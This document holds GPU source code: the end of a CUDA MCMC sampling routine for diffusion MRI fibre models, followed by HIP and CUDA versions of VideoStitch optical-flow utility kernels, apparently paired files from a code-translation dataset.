blocks << "\n"; myfile << "THREADS PER BLOCK : " << nthreads_block << "\n"; //get pointers float *datam_ptr = thrust::raw_pointer_cast(datam_gpu.data()); float *bvals_ptr = thrust::raw_pointer_cast(bvals_gpu.data()); double *alpha_ptr = thrust::raw_pointer_cast(alpha_gpu.data()); double *beta_ptr = thrust::raw_pointer_cast(beta_gpu.data()); FibreGPU *fibres_ptr = thrust::raw_pointer_cast(fibres_gpu.data()); MultifibreGPU *multifibres_ptr = thrust::raw_pointer_cast(multifibres_gpu.data()); double *signals_ptr = thrust::raw_pointer_cast(signals_gpu.data()); double *isosignals_ptr = thrust::raw_pointer_cast(isosignals_gpu.data()); curandState *randStates_ptr = thrust::raw_pointer_cast(randStates_gpu.data()); double *angtmp_ptr = thrust::raw_pointer_cast(angtmp_gpu.data()); double *oldangtmp_ptr = thrust::raw_pointer_cast(oldangtmp_gpu.data()); double *oldsignals_ptr = thrust::raw_pointer_cast(oldsignals_gpu.data()); double *oldisosignals_ptr = thrust::raw_pointer_cast(oldisosignals_gpu.data()); float *rf0_ptr = thrust::raw_pointer_cast(rf0_gpu.data()); float *rtau_ptr = thrust::raw_pointer_cast(rtau_gpu.data()); float *rs0_ptr = thrust::raw_pointer_cast(rs0_gpu.data()); float *rd_ptr = thrust::raw_pointer_cast(rd_gpu.data()); float *rdstd_ptr = thrust::raw_pointer_cast(rdstd_gpu.data()); float *rR_ptr = thrust::raw_pointer_cast(rR_gpu.data()); float *rth_ptr = thrust::raw_pointer_cast(rth_gpu.data()); float *rph_ptr = thrust::raw_pointer_cast(rph_gpu.data()); float *rf_ptr = thrust::raw_pointer_cast(rf_gpu.data()); int amount_shared = VOXELS_BLOCK_MCMC*((THREADS_VOXEL_MCMC)*sizeof(double) + (10*nfib + 27)*sizeof(float) + (7*nfib + 20)*sizeof(int)+ sizeof(curandState)); myfile << "Shared Memory Used in runmcmc_record: " << amount_shared << "\n"; if(nvox!=0){ runmcmc_kernel<<< Dim_Grid, Dim_Block, amount_shared >>>(datam_ptr, bvals_ptr, alpha_ptr, beta_ptr, randStates_ptr, opts.R_prior_mean.value(), opts.R_prior_std.value(),opts.R_prior_fudge.value(), ndirections, nfib, nparams, opts.modelnum.value(), opts.fudge.value(), opts.f0.value(), opts.ardf0.value(), !opts.no_ard.value(), opts.rician.value(), gradnonlin, opts.updateproposalevery.value(), opts.njumps.value(), opts.nburn.value(), opts.sampleevery.value(), totalrecords, oldsignals_ptr, oldisosignals_ptr, angtmp_ptr, oldangtmp_ptr, fibres_ptr, multifibres_ptr, signals_ptr, isosignals_ptr, rf0_ptr, rtau_ptr, rs0_ptr, rd_ptr, rdstd_ptr, rR_ptr, rth_ptr, rph_ptr, rf_ptr); sync_check("runmcmc_record_kernel"); } gettimeofday(&t_tot2,NULL); time=timeval_diff(&t_tot2,&t_tot1); myfile << "TIME: " << time << " seconds\n"; myfile << "-----------------------------------------------------" << "\n" ; myfile.close(); }
63bfae59361b30a760c321ff1af98751cec90241.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" // Copyright (c) 2012-2017 VideoStitch SAS // Copyright (c) 2018 stitchEm #include "opticalFlowUtils.hpp" #include "backend/common/vectorOps.hpp" #include "backend/cuda/deviceBuffer.hpp" #include "backend/cuda/deviceStream.hpp" #include "gpu/image/sampling.hpp" #include "gpu/image/imageOps.hpp" #include "gpu/image/blur.hpp" #include "gpu/stream.hpp" #include "cuda/error.hpp" #include "cuda/util.hpp" #include "util/imageProcessingGPUUtils.hpp" #include "backend/cuda/core1/kernels/samplingKernel.cu" #include "parallax/gpu/cuda/kernels/patchDifferenceFunction.cu" #define REGULARIZATION_TILE_WIDTH 16 #define KERNEL_SIZE 25 #define AREA_SIZE (REGULARIZATION_TILE_WIDTH + 2 * KERNEL_SIZE) #define TILE_WIDTH 16 #define CUDABLOCKSIZE 512 namespace VideoStitch { namespace Util { __global__ void backwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); if (inRange(relativeOutputCoord, outputSize)) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } } } } Status OpticalFlow::backwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( backwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } struct BilinearFlowInterpolation { typedef float2 Type; static inline __device__ float2 interpolate(float2 a, float2 b, float2 c, float2 d) { if (a.x == INVALID_FLOW_VALUE || b.x == INVALID_FLOW_VALUE || c.x == INVALID_FLOW_VALUE || d.x == INVALID_FLOW_VALUE) { return make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } else { return (9.0f / 16.0f * a + 3.0f / 16.0f * (b + c) + 1.0f / 16.0f * d); } } }; Status OpticalFlow::upsampleFlow22(GPU::Buffer<float2> dst, GPU::Buffer<const float2> src, std::size_t dstWidth, std::size_t dstHeight, bool wrap, unsigned blockSize, GPU::Stream stream) { const unsigned srcWidth = ((unsigned)dstWidth + 1) / 2; const unsigned srcHeight = ((unsigned)dstHeight + 1) / 2; const dim3 dimBlock(blockSize, blockSize, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(srcWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(srcHeight, dimBlock.y), 1); if (wrap) { hipLaunchKernelGGL(( Image::upsample22Kernel<Image::HWrapBoundary<float2>, BilinearFlowInterpolation>) , dim3(dimGrid), dim3(dimBlock), (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get(), dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } else { hipLaunchKernelGGL(( Image::upsample22Kernel<Image::ExtendBoundary<float2>, BilinearFlowInterpolation>) , dim3(dimGrid), dim3(dimBlock), (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get(), dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } return CUDA_STATUS; } __global__ void outwardCoordLookupKernel(const int2 offset1, int2 size1, const float2* g_iCoord, const int2 offset0, const int2 size0, const uint32_t* g_iBuffer, uint32_t* g_oBuffer) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size1.x && y < size1.y) { g_oBuffer[y * size1.x + x] = 0; const float2 iCoord = g_iCoord[y * size1.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { // const float2 outputCoord = make_float2(offset1.x - offset0.x + x + iCoord.x, offset1.y - offset0.y + y + // iCoord.y); if (inRange(outputCoord, size0)) { g_oBuffer[y * size1.x + x] = g_iBuffer[y * size0.x + x]; } } } } Status OpticalFlow::outwardCoordLookup(const int2 offset1, const int2 size1, const GPU::Buffer<const float2> coordBuffer, const int2 offset0, const int2 size0, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size1.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size1.y, dimBlock.y), 1); hipLaunchKernelGGL(( outwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, offset1, size1, coordBuffer.get(), offset0, size0, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void forwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 originalOffset, const int2 originalSize, const float2* g_originalCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); const float2 originalOutputcoord = outputCoord - make_float2(originalOffset.x, originalOffset.y); // Check the original flow value, in exist at all float2 originalFlow = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); if (inRange(originalOutputcoord, originalSize)) { originalFlow = g_originalCoord[int(originalOutputcoord.y) * originalSize.x + int(originalOutputcoord.x)]; } if (inRange(relativeOutputCoord, outputSize)) { if (originalFlow.x == INVALID_FLOW_VALUE) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } else { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = originalFlow; } } } } } Status OpticalFlow::forwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 originalOffset, const int2 originalSize, const GPU::Buffer<const float2> originalCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( forwardCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputCoordBuffer.get(), originalOffset, originalSize, originalCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } __global__ void putOverOriginalFlowKernel(const int2 inputOffset, const int2 inputSize, const float2* const inputFlow, const int2 outputOffset, const int2 outputSize, float2* outputFlow) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= inputSize.x || y >= inputSize.y) return; float2 input = inputFlow[y * inputSize.x + x]; if (input.x != INVALID_FLOW_VALUE) { int2 outputCoord = make_int2(x, y) + inputOffset - outputOffset; if (inRange(outputCoord, outputSize)) { outputFlow[outputCoord.y * outputSize.x + outputCoord.x] = input; } } } Status OpticalFlow::putOverOriginalFlow(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputFlow, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputFlow, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); hipLaunchKernelGGL(( putOverOriginalFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, inputOffset, inputSize, inputFlow.get(), outputOffset, outputSize, outputFlow.get()); return CUDA_STATUS; } __global__ void identityFlowKernel(const bool normalizedFlow, const int2 size, float2* coordBuffer) { uint32_t x = blockIdx.x * blockDim.x + threadIdx.x; uint32_t y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size.x || y >= size.y) return; if (normalizedFlow) { coordBuffer[y * size.x + x] = make_float2(float(x) / size.x, float(y) / size.y); } else { coordBuffer[y * size.x + x] = make_float2(x, y); } } Status OpticalFlow::generateIdentityFlow(const int2 size, GPU::Buffer<float2> coordBuffer, GPU::Stream gpuStream, const bool normalizedFlow) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( identityFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, normalizedFlow, size, coordBuffer.get()); return CUDA_STATUS; } __global__ void transformOffsetToFlowKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 offset = inputBuffer[y * size0.x + x]; if (offset.x != INVALID_FLOW_VALUE) { outputBuffer[y * size0.x + x] = offset + make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); } else { outputBuffer[y * size0.x + x] = offset; } } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, GPU::Buffer<float2> buffer, GPU::Stream gpuStream) { return transformOffsetToFlow(size0, offset0, offset1, buffer, buffer, gpuStream); } Status OpticalFlow::transformOffsetToFlow(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( transformOffsetToFlowKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void transformFlowToOffsetKernel(const int2 size0, const int2 offset0, const int2 offset1, const float2* const inputBuffer, float2* const outputBuffer) { int x = blockIdx.x * blockDim.x + threadIdx.x; int y = blockIdx.y * blockDim.y + threadIdx.y; if (x >= size0.x || y >= size0.y) return; float2 flow = inputBuffer[y * size0.x + x]; if (flow.x != INVALID_FLOW_VALUE) outputBuffer[y * size0.x + x] = flow - make_float2(x + offset0.x - offset1.x, y + offset0.y - offset1.y); else outputBuffer[y * size0.x + x] = flow; } Status OpticalFlow::transformFlowToOffset(const int2 size0, const int2 offset0, const int2 offset1, const GPU::Buffer<const float2> inputBuffer, GPU::Buffer<float2> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size0.x, TILE_WIDTH), (unsigned)Cuda::ceilDiv(size0.y, TILE_WIDTH), 1); hipLaunchKernelGGL(( transformFlowToOffsetKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size0, offset0, offset1, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void coordLookupKernel(int outputWidth, int outputHeight, const float2* g_iCoord, int inputWidth, int inputHeight, const uint32_t* g_idata, uint32_t* g_odata) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < outputWidth && y < outputHeight) { float2 uv = g_iCoord[y * outputWidth + x]; int2 size = make_int2(inputWidth, inputHeight); g_odata[y * outputWidth + x] = Image::bilinearLookup<Image::BilinearLookupRGBAtoRGBA>(uv, size, g_idata); } } Status OpticalFlow::coordLookup(const int outputWidth, const int outputHeight, const GPU::Buffer<const float2> coordBuffer, const int inputWidth, const int inputHeight, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(outputWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(outputHeight, dimBlock.y), 1); hipLaunchKernelGGL(( coordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, outputWidth, outputHeight, coordBuffer.get(), inputWidth, inputHeight, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] *= toMul; } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); hipLaunchKernelGGL(( mulFlowOperatorKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), dst.get(), toMul, size); return CUDA_STATUS; } __global__ void mulFlowOperatorKernel(float2* dst, const float2* src, const float2 toMul, std::size_t size) { std::size_t i = (blockIdx.x + blockIdx.y * gridDim.x) * blockDim.x + threadIdx.x; if (i < size) { if (dst[i].x != INVALID_FLOW_VALUE) { dst[i] = make_float2(src[i].x * toMul.x, src[i].y * toMul.y); } } } Status OpticalFlow::mulFlowOperator(GPU::Buffer<float2> dst, const GPU::Buffer<const float2> src, const float2 toMul, std::size_t size, GPU::Stream stream) { dim3 dimBlock(CUDABLOCKSIZE); dim3 dimGrid(Cuda::compute2DGridForFlatBuffer(size, CUDABLOCKSIZE)); hipLaunchKernelGGL(( mulFlowOperatorKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), dst.get(), src.get(), toMul, size); return CUDA_STATUS; } __global__ void generateWeightKernel(const int kernelSize, const float sigmaDistance, float* kernelWeight) { int y = blockIdx.y * blockDim.x + threadIdx.y; int x = blockIdx.x * blockDim.y + threadIdx.x; if (x <= 2 * kernelSize && y <= 2 * kernelSize) { float maxDist = kernelSize * 1.4142; float distSpace = length(make_float2(x - kernelSize, y - kernelSize)) / maxDist; float weightDist = exp(-sigmaDistance * distSpace * distSpace); kernelWeight[y * (2 * kernelSize + 1) + x] = weightDist; } } __global__ void interCoordLookupKernel(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const uint32_t* inputBuffer, const int coordWidth, const int coordHeight, const float2* coordBuffer, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < coordWidth && y < coordHeight) { float2 coord = coordBuffer[y * coordWidth + x] - make_float2(interOffsetX, interOffsetY); if (coord.x >= 0 && coord.x < interWidth && coord.y >= 0 && coord.y < interHeight) { outputBuffer[y * coordWidth + x] = inputBuffer[int(coord.y) * interWidth + int(coord.x)]; } else { outputBuffer[y * coordWidth + x] = 0; } } } Status OpticalFlow::interCoordLookup(const int warpWidth, const int interOffsetX, const int interOffsetY, const int interWidth, const int interHeight, const GPU::Buffer<const uint32_t> inputBuffer, const int coordWidth, const int coordHeight, const GPU::Buffer<const float2> coordBuffer, GPU::Buffer<uint32_t> output, GPU::Stream gpuStream) { hipStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(coordWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(coordHeight, dimBlock.y), 1); hipLaunchKernelGGL(( interCoordLookupKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, warpWidth, interOffsetX, interOffsetY, interWidth, interHeight, inputBuffer.get(), coordWidth, coordHeight, coordBuffer.get(), output.get()); return CUDA_STATUS; } __global__ void flowToRGBAKernel(const int2 size, const float2* inputBuffer, const int2 maxFlowValue, uint32_t* outputBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { float2 input = inputBuffer[y * size.x + x]; if (abs(input.x - INVALID_FLOW_VALUE) < 1e-5) { outputBuffer[y * size.x + x] = 0; } else { outputBuffer[y * size.x + x] = Image::RGBA::pack((float(input.x) / maxFlowValue.x) * 255, (float(input.y) / maxFlowValue.y) * 255, 0, 255); } } } Status OpticalFlow::convertFlowToRGBA(const int2 size, const GPU::Buffer<const float2> src, const int2 maxFlowValue, GPU::Buffer<uint32_t> dst, GPU::Stream stream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); hipLaunchKernelGGL(( flowToRGBAKernel), dim3(dimGrid), dim3(dimBlock), 0, stream.get(), size, src.get(), maxFlowValue, dst.get()); return CUDA_STATUS; } __global__ void setAlphaToFlowBufferKernel(const int2 size, const uint32_t* colorBuffer, float2* flowBuffer) { // calculate normalized texture coordinates const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size.x && y < size.y) { const unsigned index = y * size.x + x; if (Image::RGBA::a(colorBuffer[index]) == 0) { flowBuffer[index] = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } } } Status OpticalFlow::setAlphaToFlowBuffer(const int2 size, const GPU::Buffer<const uint32_t> colorBuffer, GPU::Buffer<float2> flowBuffer, GPU::Stream gpuStream) { dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size.y, dimBlock.y), 1); hipStream_t stream = gpuStream.get(); hipLaunchKernelGGL(( setAlphaToFlowBufferKernel), dim3(dimGrid), dim3(dimBlock), 0, stream, size, colorBuffer.get(), flowBuffer.get()); return CUDA_STATUS; } } // namespace Util } // namespace VideoStitch
63bfae59361b30a760c321ff1af98751cec90241.cu
// Copyright (c) 2012-2017 VideoStitch SAS // Copyright (c) 2018 stitchEm #include "opticalFlowUtils.hpp" #include "backend/common/vectorOps.hpp" #include "backend/cuda/deviceBuffer.hpp" #include "backend/cuda/deviceStream.hpp" #include "gpu/image/sampling.hpp" #include "gpu/image/imageOps.hpp" #include "gpu/image/blur.hpp" #include "gpu/stream.hpp" #include "cuda/error.hpp" #include "cuda/util.hpp" #include "util/imageProcessingGPUUtils.hpp" #include "backend/cuda/core1/kernels/samplingKernel.cu" #include "parallax/gpu/cuda/kernels/patchDifferenceFunction.cu" #define REGULARIZATION_TILE_WIDTH 16 #define KERNEL_SIZE 25 #define AREA_SIZE (REGULARIZATION_TILE_WIDTH + 2 * KERNEL_SIZE) #define TILE_WIDTH 16 #define CUDABLOCKSIZE 512 namespace VideoStitch { namespace Util { __global__ void backwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); if (inRange(relativeOutputCoord, outputSize)) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } } } } Status OpticalFlow::backwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); backwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputCoordBuffer.get(), outputOffset, outputSize, outputCoordBuffer.get()); return CUDA_STATUS; } struct BilinearFlowInterpolation { typedef float2 Type; static inline __device__ float2 interpolate(float2 a, float2 b, float2 c, float2 d) { if (a.x == INVALID_FLOW_VALUE || b.x == INVALID_FLOW_VALUE || c.x == INVALID_FLOW_VALUE || d.x == INVALID_FLOW_VALUE) { return make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); } else { return (9.0f / 16.0f * a + 3.0f / 16.0f * (b + c) + 1.0f / 16.0f * d); } } }; Status OpticalFlow::upsampleFlow22(GPU::Buffer<float2> dst, GPU::Buffer<const float2> src, std::size_t dstWidth, std::size_t dstHeight, bool wrap, unsigned blockSize, GPU::Stream stream) { const unsigned srcWidth = ((unsigned)dstWidth + 1) / 2; const unsigned srcHeight = ((unsigned)dstHeight + 1) / 2; const dim3 dimBlock(blockSize, blockSize, 1); const dim3 dimGrid((unsigned)Cuda::ceilDiv(srcWidth, dimBlock.x), (unsigned)Cuda::ceilDiv(srcHeight, dimBlock.y), 1); if (wrap) { Image::upsample22Kernel<Image::HWrapBoundary<float2>, BilinearFlowInterpolation> <<<dimGrid, dimBlock, (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get()>>>( dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } else { Image::upsample22Kernel<Image::ExtendBoundary<float2>, BilinearFlowInterpolation> <<<dimGrid, dimBlock, (blockSize + 2) * (blockSize + 2) * sizeof(float2), stream.get()>>>( dst.get(), src.get(), (unsigned)dstWidth, (unsigned)dstHeight, srcWidth, srcHeight); } return CUDA_STATUS; } __global__ void outwardCoordLookupKernel(const int2 offset1, int2 size1, const float2* g_iCoord, const int2 offset0, const int2 size0, const uint32_t* g_iBuffer, uint32_t* g_oBuffer) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < size1.x && y < size1.y) { g_oBuffer[y * size1.x + x] = 0; const float2 iCoord = g_iCoord[y * size1.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { // const float2 outputCoord = make_float2(offset1.x - offset0.x + x + iCoord.x, offset1.y - offset0.y + y + // iCoord.y); if (inRange(outputCoord, size0)) { g_oBuffer[y * size1.x + x] = g_iBuffer[y * size0.x + x]; } } } } Status OpticalFlow::outwardCoordLookup(const int2 offset1, const int2 size1, const GPU::Buffer<const float2> coordBuffer, const int2 offset0, const int2 size0, const GPU::Buffer<const uint32_t> inputBuffer, GPU::Buffer<uint32_t> outputBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(size1.x, dimBlock.x), (unsigned)Cuda::ceilDiv(size1.y, dimBlock.y), 1); outwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(offset1, size1, coordBuffer.get(), offset0, size0, inputBuffer.get(), outputBuffer.get()); return CUDA_STATUS; } __global__ void forwardCoordLookupKernel(const int2 inputOffset, int2 inputSize, const float2* g_iCoord, const int2 originalOffset, const int2 originalSize, const float2* g_originalCoord, const int2 outputOffset, int2 outputSize, float2* g_oCoord) { const int x = blockIdx.x * blockDim.x + threadIdx.x; const int y = blockIdx.y * blockDim.y + threadIdx.y; if (x < inputSize.x && y < inputSize.y) { const float2 iCoord = g_iCoord[y * inputSize.x + x]; if (iCoord.x != INVALID_FLOW_VALUE) { const float2 inputCoord = make_float2(inputOffset.x + x, inputOffset.y + y); const float2 outputCoord = inputCoord + iCoord; const float2 relativeOutputCoord = outputCoord - make_float2(outputOffset.x, outputOffset.y); const float2 originalOutputcoord = outputCoord - make_float2(originalOffset.x, originalOffset.y); // Check the original flow value, in exist at all float2 originalFlow = make_float2(INVALID_FLOW_VALUE, INVALID_FLOW_VALUE); if (inRange(originalOutputcoord, originalSize)) { originalFlow = g_originalCoord[int(originalOutputcoord.y) * originalSize.x + int(originalOutputcoord.x)]; } if (inRange(relativeOutputCoord, outputSize)) { if (originalFlow.x == INVALID_FLOW_VALUE) { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = make_float2(0, 0) - iCoord; } else { g_oCoord[int(round(relativeOutputCoord.y)) * outputSize.x + int(round(relativeOutputCoord.x))] = originalFlow; } } } } } Status OpticalFlow::forwardCoordLookup(const int2 inputOffset, const int2 inputSize, const GPU::Buffer<const float2> inputCoordBuffer, const int2 originalOffset, const int2 originalSize, const GPU::Buffer<const float2> originalCoordBuffer, const int2 outputOffset, const int2 outputSize, GPU::Buffer<float2> outputCoordBuffer, GPU::Stream gpuStream) { cudaStream_t stream = gpuStream.get(); dim3 dimBlock(TILE_WIDTH, TILE_WIDTH, 1); dim3 dimGrid((unsigned)Cuda::ceilDiv(inputSize.x, dimBlock.x), (unsigned)Cuda::ceilDiv(inputSize.y, dimBlock.y), 1); forwardCoordLookupKernel<<<dimGrid, dimBlock, 0, stream>>>(inputOffset, inputSize, inputCoordBuffer.get(), originalOffset, originalSize, originalCoordBuffer.get(), outputOffset, 